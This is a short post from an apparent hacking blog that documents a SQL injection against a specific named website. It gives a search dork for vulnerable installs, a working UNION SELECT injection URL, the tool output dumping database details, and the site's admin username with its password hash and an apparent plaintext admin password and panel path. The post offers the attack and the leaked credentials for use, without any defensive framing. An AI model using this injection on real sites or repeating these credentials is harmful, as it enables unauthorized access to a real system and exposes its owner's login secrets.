[SQLi] http://www.endonesia.org ~ viperfx07 blog (hack + crack + web + app)

Tuesday, February 3, 2009

[SQLi] http://www.endonesia.org

5:51 PM Posted by viperfx07 hacking No comments

Dork : "Powered by endonesia 8.4"
Tools: schemafuzz.py v5.0 mod by me
Admin panel: /admin
Admin usr/pwd : Endonesia:jatwar22


[+] URL:http://www.endonesia.org/mod.php?mod=publisher&op=viewarticle&cid=1&artid=2+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 17:46:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
 Database: endorg_endorg
 User: endorg_endorg@localhost
 Version: 5.0.67-community
[+] Dumping data from database "endorg_endorg" Table "authors"
[+] Column(s) ['aid', 'pwd']
[+] Number of Rows: 1

[0] Endonesia:ca1db2899cf4bb64cd1b67ea68140bcc

viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, February 3, 2009

[SQLi] http://www.endonesia.org

0 comments:

Post a Comment